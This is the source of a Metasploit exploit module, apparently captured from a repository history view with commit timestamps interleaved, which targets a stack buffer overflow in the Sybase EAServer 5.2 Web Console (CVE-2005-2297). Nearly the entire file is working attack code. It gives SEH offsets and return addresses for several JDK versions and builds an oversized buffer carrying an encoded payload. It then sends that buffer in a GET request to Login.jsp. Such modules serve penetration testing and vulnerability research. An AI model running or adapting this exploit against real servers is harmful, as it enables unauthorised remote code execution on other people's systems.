metasploit-framework/modules/exploits/windows/http/sybase_easerver.rb

86 lines
2.7 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = AverageRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Sybase EAServer 5.2 Remote Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Sybase EAServer Web
Console. The offset to the SEH frame appears to change depending
on what version of Java is in use by the remote server, making this
exploit somewhat unreliable.
},
'Author' => [ 'Unknown' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2005-2297' ],
[ 'OSVDB', '17996' ],
[ 'BID', '14287'],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Technically we could combine these into a single multi-return string...
['Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', {'Ret' => 0x6d4548ff, 'Offset' => 3820}],
['Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', {'Ret' => 0x6d4548ff, 'Offset' => 3841}],
['Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', {'Ret' => 0x08041b25, 'Offset' => 3912}],
['Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', {'Ret' => 0x08041b25, 'Offset' => 3925}],
],
'DisclosureDate' => 'Jul 25 2005'))
2013-08-30 21:28:54 +00:00
register_options(
[
OptString.new('DIR', [ true, "Directory of Login.jsp script", '/WebConsole/' ]),
Opt::RPORT(8080)
], self.class)
end
2013-08-30 21:28:54 +00:00
def exploit
2013-08-30 21:28:54 +00:00
print_status( "Attempting to exploit...")
2013-08-30 21:28:54 +00:00
# Building the evil buffer
crash = rand_text_alphanumeric(5000, payload_badchars)
crash[ target['Offset'] - 4, 2 ] = "\xeb\x06"
crash[ target['Offset'] , 4 ] = [target.ret].pack('V')
crash[ target['Offset'] + 4, payload.encoded.length ] = payload.encoded
2013-08-30 21:28:54 +00:00
# Sending the request
res = send_request_cgi({
2014-05-25 17:29:39 +00:00
'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'),
'method' => 'GET',
'headers' => {
'Accept' => '*/*',
},
'vars_get' => {
crash => nil
2013-08-30 21:28:54 +00:00
}
}, 5)
2013-08-30 21:28:54 +00:00
print_status("Overflow request sent, sleeping for four seconds")
select(nil,nil,nil,4)
end
end